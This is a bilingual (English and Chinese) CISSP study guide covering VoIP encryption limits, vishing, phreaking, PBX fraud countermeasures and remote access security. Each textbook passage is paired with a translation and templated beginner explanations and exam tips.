Voice over Internet Protocol (VoIP) Voice over Internet Protocol (VoIP) is a technology that encapsulates audio into IP packets to support telephone calls over TCP/IP network connections. VoIP is also the basis for many multimedia messaging services that combine audio, video, chat, file exchange, whiteboard, and application collaboration. In Chapter 11, we discussed VoIP and mentioned that Secure Real-time Transport Protocol (SRTP) may be used to provide encryption. However, it is important to clarify when and if this encryption is of any use. VoIP encryption is widely available but rarely end-to-end.

VoIP is not a single technology, even though it uses common standardized protocols—just as there are many different operating systems that communicate over the TCP/IP protocol suite. VoIP products from different vendors often do not interoperate on anything other than the transmission of the audio communication itself. For example, if you have VoIP phone service provided by your ISP, you may have a VoIP phone sitting on your desk that looks and acts like a traditional PSTN phone. The difference is that it is plugged into the LAN rather than a telephone line. The VoIP service provided by your ISP might not offer any form of encryption.

Thus, it would be impossible to obtain end-to-end encryption using that service. However, even if your ISP provided encrypted VoIP services, it would only establish end-to-end encryption if you called someone using the same ISP-provided VoIP service. If you called someone using another VoIP solution, you likely would not end up with an end-to-end encrypted connection. This is one of the most misunderstood aspects of VoIP services. It is often marketed as being an encrypted service. However, the advertisements fail to point out that the encryption is only established between compatible devices and service providers, which is usually limited to their own proprietary

中文直译 / 整理

在高速、经济且无处不在的接入方式出现之前,PSTN 连接是许多企业的唯一 或主要远程网络链接。 一旦宽带和无线服务变得更加普及,POTS/PSTN 在家 庭用户互联网连接中的使用也逐渐减少。 然而,当宽带解决方案失效时, PSTN 连接有时仍被用作远程连接的备用选项。 对于农村互联网和远程连接, PSTN 可能仍然是唯一的选择。 当 VoIP 或宽带解决方案不可用、中断或不具 成本效益时,PSTN 也用作标准语音线路。 互联网语音协议(VoIP) 互联网语音协议(VoIP)是一种将音频封装为IP数据包的技术,以通过 TCP/IP网络连接支持电话呼叫。 VoIP也是许多多媒体消息服务的基础,这些 服务结合了音频、视频、聊天、文件交换、白板和应用程序协作。 在 第11章中,我们讨论了VoIP,并提到可以使用安全实时传输协议(SRTP) 来提供加密。 然而,重要的是要澄清这种加密在何时以及是否真正有用。 VoIP加密广泛可用,但很少实现端到端加密。 VoIP并非单一技术,尽管它使用 了常见的标准化协议——正如存在许多不同的操作系统通过TCP/IP协议族进行 通信一样。

不同厂商的VoIP产品通常仅在音频通信的传输层面互操作,其他方 面往往无法互通。 例如,如果您通过您的互联网服务提供商(ISP)获得VoIP电话服务,您可能 会在桌面上放置一部外观和功能都类似于传统PSTN电话的VoIP电话。 不同之 处在于,它连接的是局域网而非电话线。 您的ISP提供的VoIP服务可能不提供 任何形式的加密。 因此,使用该服务无法实现端到端加密。 然而,即使您的 ISP提供了加密的VoIP服务,也只有在您拨打同样使用该ISP提供的VoIP服务 的对方时,才能建立端到端加密。 如果您拨打的是其他VoIP解决方案的用户, 您很可能无法获得端到端加密的连接。 这是VoIP服务中最被误解的方面之一。 它通常被宣传为一种加密服务。 然而, 广告并未指出,加密仅在兼容的设备和服务提供商之间建立,通常仅限于其专 有的

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

考试常让你把协议、端口、层次对应起来。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 10 / PDF P847

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

variation of VoIP. In order to communicate with another phone outside of the ISP's VoIP services, a VoIP-to-PSTN gateway must be present. This gateway supports calls from a VoIP phone to make their way to a traditional PSTN landline or mobile phone, and vice versa. If you are using ISP A's VoIP service to call someone using ISP B's VoIP service, your call will likely go through one or more gateways and likely traverse some portion of the PSTN network. Therefore, your call may be encrypted from your phone to the gateway, but it will have to be decrypted to traverse the gateway and the intermediary network.

When the connection reaches the callee's service gateway, it may be encrypted again from the gateway to the destination phone. There are likely some VoIP providers that have a direct gateway interface between their VoIP solution and another VoIP provider's network, but unless they happen to have compatible configurations, they still will have to decrypt and re-encrypt at the gateway. Therefore, unless you stay within the same VoIP provider's network, you cannot be assured that your connection is protected by end-to-end encryption. However, even if your VoIP services somehow provide you with secured connections, a VoIP solution is still vulnerable to a number of other threats.

These include all of the standard network attacks, like AitM, hijacking, pharming, and denial-of-service (DoS). Plus, there are also the concerns of vishing, phreaking, fraud, and abuse. Securing VoIP communications often involves specific application of many common security concepts: Use strong passwords and two-factor authentication. Record call logs and inspect for unusual activity. Block international calling. Outsource VoIP to a trusted SaaS. Update VoIP equipment firmware. Restrict physical access to VoIP-related networking equipment. Train users on VoIP security best practices. Prevent ghost or phantom calls on IP phones by blocking nonexistent or invalid-origin numbers.

Implement NIPS with VoIP evaluation features. VoIP

中文直译 / 整理

变体。 为了与ISP的VoIP服务之外的另一部电话通信,必须存在VoIP到 PSTN的网关。 该网关支持VoIP电话呼叫通往传统的PSTN固话或移动电话,反 之亦然。 如果您使用ISP A的VoIP服务拨打使用ISP B的VoIP服务的用户,您 的通话可能会经过一个或多个网关,并可能经过PSTN网络的部分路段。 因此, 您的通话可能从您的电话到网关之间是加密的,但为了通过网关和中间网络, 必须进行解密。 当连接到达接收方的服务网关时,可能会再次从网关加密到目 标电话。 可能有一些VoIP提供商在其VoIP解决方案与其他VoIP提供商的网络之间具有 直接网关接口,但除非它们恰好具有兼容的配置,否则仍需在网关处进行解密 和重新加密。 因此,除非您始终在同一个VoIP提供商的网络内,否则无法保证 您的连接受到端到端加密的保护。 然而,即使您的VoIP服务以某种方式提供了安全的连接,VoIP解决方案仍易 受多种其他威胁的影响。 这些威胁包括所有标准的网络攻击,如中间人攻击 (AitM)、劫持、钓鱼和拒绝服务(DoS)。 此外,还存在语音钓鱼( vishing)、盗号、欺诈和滥用等问题。

保护VoIP通信通常涉及对许多常见安全概念的具体应用: 使用强密码和双重身份验证。 记录通话日志并检查异常活动。 阻止国际通话。 将VoIP外包给可信的SaaS。 更新VoIP设备固件。 限制对VoIP相关网络设备的物理访问。 对用户进行VoIP安全最佳实践培训。 通过阻止不存在或来源无效的号码,防止IP电话出现幽灵或幻听呼叫。 部署具有VoIP评估功能的网络入侵防御系统(NIPS)。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

IPS 放在线路中,误报可能影响可用性。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 11 / PDF P848

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

Vishing and Phreaking Malicious individuals can exploit voice communications through social engineering. Social engineering is a means by which an unknown, untrusted, or at least unauthorized person gains the trust of someone inside your organization in order to gain access to information or to a system. For more on social engineering in general, see Chapter 2, “Personnel Security and Risk Management Concepts.” VoIP services are a favorite tool of social engineers because it allows them to call anyone with little to no expense. VoIP also allows the adversary to falsify their Caller ID in order to mask their identity or establish a pretext to fool the victim.

Anyone who can receive a call, whether using a traditional PSTN landline, a PBX business line, a mobile phone, or a VoIP solution, can be the target of a VoIP-originated voice-based social engineering attack. This type of attack is known as vishing, which stands for voice-based phishing. The only way to protect against vishing is to teach users how to respond and interact with any form of communication. Here are some guidelines: Always err on the side of caution whenever voice communications seem odd, out of place, or unexpected. Always request proof of identity before continuing a call related to anything sensitive, personal, financial, or confidential.

Require callback authorizations on all voice-only requests for network alterations or activities. A callback authorization occurs when the initial client connection is disconnected, and a person or party calls the client on a predetermined number that will usually be stored in a corporate directory in order to verify the identity of the client. Classify information (usernames, passwords, IP addresses, manager names, dial-in numbers, and so on), and clearly indicate which information can be discussed or even confirmed using voice communications.

If privileged information is requested over the phone by an individual who should know that giving out that particular information over the phone is against the company's security policy, ask why the information is needed and verify their identity again. This incident should also be reported to the security administrator. Never give out or change passwords via voice-only communications.

中文直译 / 整理

语音钓鱼和电话欺诈 恶意人员可以通过社会工程学利用语音通信。 社会工程学是一种手段,通过该 手段,一个未知、不可信或至少未经授权的人获得您组织内部人员的信任,以 获取信息或系统访问权限。 有关社会工程学的更多信息,请参见第2章,“人 员安全与风险管理概念。 ” VoIP服务是社会工程攻击者最喜欢的工具,因为它允许他们以极低甚至零成本 拨打任何人的电话。 VoIP还允许攻击者伪造来电显示,以隐藏其身份或建立借 口欺骗受害者。 任何能够接听电话的人,无论是使用传统的PSTN固话、PBX 企业专线、移动电话还是VoIP解决方案,都可能成为基于VoIP的语音社会工 程攻击的目标。 这种攻击被称为vishing,即基于语音的网络钓鱼。 防范语音钓鱼的唯一方法是教育用户如何应对和处理任何形式的通信。 以下是一 些指导原则: 只要语音通信显得奇怪、不合常理或出乎意料,就应始终采取谨慎态度。 在继续任何涉及敏感、个人、财务或机密信息的通话前,务必要求对方 提供身份证明。 对于所有仅通过语音提出的网络修改或操作请求,均需要求回拨授权。

回拨授权是指在初始客户端连接断开后,对方通过一个预设的号码(通 常存储在公司目录中)主动回拨给客户,以验证客户身份。 对信息(用户名、密码、IP地址、管理人员姓名、拨入号码等)进行 分类,并明确指出哪些信息可以通过语音通信进行讨论甚至确认。 如果有人通过电话索要特权信息,而该人员本应知道通过电话泄露此类信 息违反公司安全政策,则应询问其需要该信息的原因,并再次核实其身份。 此事件还应报告给安全管理员。 切勿通过仅语音通信的方式泄露或更改密码。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

指南:指南是建议做法,不一定强制。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Recommended、not compulsory 常对应 guideline。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
指南 指南是建议做法,不一定强制。
身份 身份是主体在系统中的标识。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 12 / PDF P849

第 849 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Block numbers that are associated with vishing. Don't assume that the displayed Caller ID is valid. Caller ID should be used as an indicator of who you don't want to talk to, not a confirmation of who is calling. Malicious attackers known as phreakers abuse phone systems in much the same way that attackers abuse computer networks (the “ph” represents “phone”). Phreaking is a specific type of attack directed toward the telephone system and voice services in general. Phreakers use various types of technology to circumvent the telephone system to make free long-distance calls, alter the function of telephone service, steal specialized services, and even cause service disruptions.

Some phreaker tools are actual devices, whereas others are just particular ways of using a regular telephone. Although phreakers originally focused on PSTN phones and systems, they have evolved as voice technology has evolved. Phreakers can attack mobile devices, PBX systems, and VoIP solutions. PBX Fraud and Abuse Another voice communications threat is private branch exchange fraud and abuse. Private branch exchange (PBX) is a telephone switching or exchange system deployed in private organizations in order to enable multistation use of a small number of external PSTN lines. For example, a PBX may allow 150 phones in the office to have shared access to 20 leased PSTN lines.

Many PBX systems allowed for interoffice calls without using external lines, assigned extension numbers to each handset, supported voice mail per extension, and remote calling. Remote calling, also known as hoteling, is the ability to be outside the offices, call into the office PBX system, type in a code to access a dial tone, and then dial another phone number. The original purpose of remote calling was to save money by having external personnel call the office on a toll-free number, and then make any long-distance calls on the office's long-distance calling plan. Many PBX systems can be exploited by malicious individuals to avoid toll charges and hide their identity.

Phreakers may be able to gain unauthorized access to personal voice mailboxes, redirect messages, block access, and redirect inbound and outbound calls. Countermeasures to PBX fraud and abuse include many of the same precautions you would employ to protect a typical computer network: logical

中文直译 / 整理

阻止与语音钓鱼相关的号码。 不要假设显示的来电者ID是有效的。 来电者ID应作为你不想接听的来电 者的提示,而不是确认来电者身份的依据。 恶意攻击者,称为phreakers,以与攻击计算机网络类似的方式滥用电话系统 (“ph”代表“phone”)。 Phreaking是一种专门针对电话系统和语音服务 的一类攻击。 Phreakers 使用各种技术绕过电话系统,以实现免费长途通话、 更改电话服务功能、窃取专用服务,甚至造成服务中断。 一些 phreaker 工具 是实际设备,而另一些则只是使用普通电话的特定方式。 尽管早期的电话黑客主要关注PSTN电话和系统,但随着语音技术的发展, 他们也不断演变。 电话黑客可以攻击移动设备、PBX系统和VoIP解决方案。 PBX欺诈与滥用 另一种语音通信威胁是专用交换机欺诈与滥用。 专用交换机(PBX)是一种部 署在私营组织中的电话交换系统,旨在使多个站点共享少量外部PSTN线路。 例 如,一个PBX系统可使办公室内的150部电话共享20条租赁的PSTN线路。 许多 PBX系统允许内部通话无需使用外部线路,为每部话机分配分机号码,支持每 个分机的语音信箱功能以及远程呼叫。

远程呼叫,也称为酒店式呼叫,是指在 办公室外拨入办公室的PBX系统,输入代码以获取拨号音,然后拨打另一个电 话号码的能力。 远程呼叫的初衷是为了节省成本,让外部人员通过免费电话接 入办公室,然后使用办公室的长途通话计划进行长途呼叫。 许多PBX系统可能被恶意人士利用,以逃避通话费用并隐藏身份。 电话黑客 可能能够未经授权访问个人语音信箱,重定向消息,阻止访问,以及重定向 来电和去电。 针对PBX欺诈和滥用的应对措施包括许多与保护典型计算机网络相同的预防措施: 逻辑

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

身份:身份是主体在系统中的标识。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 849 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 13 / PDF P850

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

or technical controls, administrative controls, and physical controls. Here are several key points to keep in mind when designing a PBX security solution: Consider replacing remote access or long-distance calling through the PBX with a credit card or calling card system. Restrict dial-in and dial-out features to authorized individuals who require such functionality for their work tasks. If you still have dial-in modems, use unpublished phone numbers that are outside the prefix block range of your voice numbers. Protect administrative interfaces for the PBX. Block or disable any unassigned access codes or accounts.

Define an acceptable use policy and train users on how to properly use the system. Log and audit all activities on the PBX and review the audit trails for security and use violations. Disable maintenance modems (i.e., remote access modems used by the vendor to remotely manage, update, and tune a deployed product) and/or any form of remote administrative access. Change all default configurations, especially passwords, and capabilities related to administrative or privileged features. Block remote dialing. Keep the system current with vendor/service provider updates. Deploy direct inward system access (DISA) technologies to reduce PBX fraud by external parties.

Direct inward system access (DISA), like any other security feature, must be properly installed, configured, and monitored in order to obtain the desired security improvement. DISA adds authentication requirements to all external connections to the PBX. Simply having DISA is not sufficient. Be sure to disable all features that are not required by the organization, craft user codes/passwords that are complex and difficult to guess, and then turn on auditing to keep watch on PBX activities. Additionally, maintaining physical access control to all PBX connection centers, phone portals, and wiring closets prevents direct intrusion from on-

中文直译 / 整理

或技术控制、管理控制和物理控制。 在设计PBX安全解决方案时,请牢记以下几点: 考虑使用信用卡或呼叫卡系统替代通过PBX进行的远程访问或长途呼叫。 将拨入和拨出功能限制为仅限需要此类功能完成工作任务的授权人员。 如果您仍使用拨入调制解调器,请使用不在您语音号码前缀范围内的未公布 电话号码。 保护PBX的管理接口。 阻止或禁用任何未分配的访问代码或账户。 制定可接受使用政策,并对用户进行系统正确使用的培训。 记录并审计PBX上的所有活动,审查审计日志以发现安全和使用违规行为。 禁用维护调制解调器(即供应商用于远程管理、更新和调整已部署产品的 远程访问调制解调器)和/或任何形式的远程管理访问。 更改所有默认配置,特别是与管理或特权功能相关的密码和功能。 阻止远程拨号。 保持系统及时更新供应商/服务提供商的更新。 部署直接内线系统访问(DISA)技术,以减少外部方对PBX的欺诈行为。 直接内线系统接入(DISA),与其他任何安全功能一样,必须正确安装、配置 和监控,才能实现预期的安全提升。 DISA 为所有连接到 PBX 的外部连接增加 了身份验证要求。 仅仅启用 DISA 是不够的。

请确保禁用组织不需要的所有功 能,创建复杂且难以猜测的用户代码/密码,然后启用审计功能以监控 PBX 活 动。 此外,对所有PBX连接中心、电话端口和配线间实施物理访问控制,可防止来自 现场攻击者的直接入侵。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
身份 身份是主体在系统中的标识。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 14 / PDF P851

第 851 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

site attackers. PBX systems of the past were primarily hardwar-based. Today, there are numerous PBX systems that are primarily software solutions, which may control and manage PSTN lines or VoIP connections. These softwarebased PBX systems are potentially vulnerable to the same application and network attacks that “standard” software and computers are subjected to, such as buffer overflows, malware, DoS, AitM attacks, hijacking, and eavesdropping. Thus, if your network is not secure, then your PBX system is likely not being securely managed either. Remote Access Security Management Telecommuting, or working remotely, has become a common feature of business computing.

Telecommuting usually requires remote access, the ability of a distant client to establish a communication session with a network.

Remote access can take the following forms (among others): Connecting to a network over the Internet through a VPN Connecting to a WAP (which the local environment treats as remote access) Connecting to a terminal server system, mainframe, virtual private cloud (VPC) endpoint, virtual desktop interface (VDI), or virtual mobile interface (VMI) through a thin-client connection Connecting to an office-located PC using a remote desktop service Using cloud-based virtual desktop solutions Using a modem to dial up directly to a remote access server The first three examples use fully capable clients. They establish connections just as if they were directly connected to the LAN.

In the last three examples, all computing activities occur on the connected central system rather than on the remote client. Remote Access and Telecommuting Techniques Telecommuting is performing work at a remote location (i.e., other than the primary office). In fact, there is a good chance that you perform some form of telecommuting as part of your current job. Telecommuting clients use many remote access techniques to establish connectivity to the central office LAN. There are several types of remote access techniques:

中文直译 / 整理

过去的PBX系统主要是硬件基础的。 如今,存在大量主要为软件解决方案的 PBX系统,这些系统可控制和管理PSTN线路或VoIP连接。 这些基于软件的 PBX系统可能容易受到与“标准”软件和计算机相同的攻击,例如缓冲区溢出、 恶意软件、拒绝服务(DoS)、中间人(AitM)攻击、劫持和窃听。 因此,如 果您的网络不安全,那么您的PBX系统也很可能未得到安全管理。 远程访问安全管理 远程办公,或称远程工作,已成为商业计算中的常见特征。 远程办公通常 需要远程访问,即远程客户端与网络建立通信会话的能力。 远程访问可以 采取以下形式(包括但不限于): 通过VPN通过互联网连接到网络 连接到WAP(本地环境将其视为远程访问) 连接到终端服务器系统、大型机、虚拟私有云(VPC)端点、虚拟桌面接口( VDI)或虚拟移动设备 接口(VMI)通过瘦客户端连接 使用远程桌面服务连接到位于办公室的计算机 使用基于云的虚拟桌面解决方案 使用调制解调器直接拨号连接到远程访问服务器 前三个示例使用功能完整的客户端。 它们建立连接的方式与直接连接到局 域网相同。 在后三个示例中,所有计算活动都在连接的中央系统上进行,而不 是在远程客户端上。

远程访问和远程办公技术 远程办公是指在远程位置(即非主要办公室)执行工作。 事实上,您很可能在 当前工作中以某种形式进行远程办公。 远程办公客户端使用多种远程访问技术 来建立与中心办公室局域网的连接。 有几种类型的远程访问技术:

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 851 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
标准 标准给出必须满足的最低要求。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 15 / PDF P852

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Service-Specific Service-specific remote access gives users the ability to connect to and manipulate or interact with a single service, such as email, remotely. Remote Control Remote-control remote access grants a remote user the ability to fully control another system that is physically distant from them. The monitor and keyboard act as if they are directly connected to the remote system. Remote Node Operation Remote node operation is just another name for when a remote client establishes a direct connection to a LAN, such as with wireless, VPN, or dial-up connectivity.

A remote system connects to a remote access server, which provides the remote client with network services and possible Internet access. Remote Connection Security When remote access capabilities are deployed in any environment, security must be considered and implemented to provide protection for your private network against remote access complications: Remote access users should be stringently authenticated before being granted access. Only those users who specifically need remote access for their assigned work tasks should be granted permission to establish remote connections. All remote communications should be protected from interception and eavesdropping.

Doing so usually requires an encryption solution that provides strong protection for the authentication traffic as well as all data transmission. It is important to establish secure communication channels before initiating the transmission of sensitive, valuable, or personal information. Remote connections can pose several potential security concerns if not protected and monitored sufficiently: If anyone with a remote connection can attempt to breach the security of your organization, the benefits of physical security are reduced. Telecommuters might use insecure or less secure remote systems to access sensitive data and thus expose it to a greater risk of loss,

中文直译 / 整理

服务特定型 服务特定远程访问使用户能够远程连接到并操作或交互单个服务, 例如电子邮件。 远程控制 远程控制远程访问 允许远程用户完全控制与其物理上相距较远的另 一个系统。 显示器和键盘仿佛直接连接到远程系统。 远程节点操作 远程节点操作 只是当远程客户端建立与局域网的直接连接时的 另一种说法,例如通过无线、VPN 或拨号连接。 远程系统连接到远程访问服务 器,该服务器为远程客户端提供网络服务以及可能的互联网访问。 远程连接安全 当在任何环境中部署远程访问功能时,必须考虑并实施安全性,以保护您的 私有网络免受远程访问带来的风险: 在授予访问权限之前,应对远程访问用户进行严格的身份验证。 只有那些因工作职责明确需要远程访问的用户,才应被授权建立远程连 接。 所有远程通信都应防止被截获和窃听。 实现这一点通常需要一种加密解决 方案,以对认证流量和所有数据传输提供强有力的保护。 在传输敏感、重要或个人信息之前,建立安全的通信通道至关重要。 如果远程 连接未得到充分保护和监控,可能会带来若干潜在的安全问题: 如果任何拥有远程连接的人都可以尝试入侵您组织的安全系统,那么物理安全 的优势将大打折扣。

远程办公人员可能使用不安全或安全性较低的远程系统访问敏感数据,从 而使其面临更大的丢失风险,

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

